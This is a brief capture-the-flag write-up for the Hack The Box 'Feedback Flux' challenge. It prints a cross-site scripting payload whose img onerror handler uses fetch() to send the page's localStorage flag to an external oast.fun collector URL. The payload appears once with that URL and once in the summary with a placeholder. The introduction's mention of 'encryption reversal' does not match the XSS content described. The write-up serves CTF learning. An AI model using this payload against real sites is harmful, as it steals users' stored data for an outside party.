HackTheBox Feedback Flux Writeup
Explore the basics of cybersecurity in the Feedback Flux Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
Use a webhook like https://app.interactsh.com/#/
Get your url
Just read ./challenge/app/Jobs/AdminBot.php
1
<?xml ><img src=x onerror="fetch('https://ozyttdpkujcaljzpqpymyaliclaef8wya.oast.fun?x=' + localStorage.getItem('flag'));"> ?>
Summary
Feedback Flux is an easy-level challenge on Hack The Box that exploits a combination of Cross-Site Scripting (XSS) and server-side file reading. A webhook URL is used to capture sensitive data. The XSS payload, <img src=x onerror="fetch('<webhook_url>?x=' + localStorage.getItem('flag'));">, extracts the flag stored in localStorage. Reading ./challenge/app/Jobs/AdminBot.php provides insights into the application’s behavior, showcasing the importance of securing both client-side and server-side components.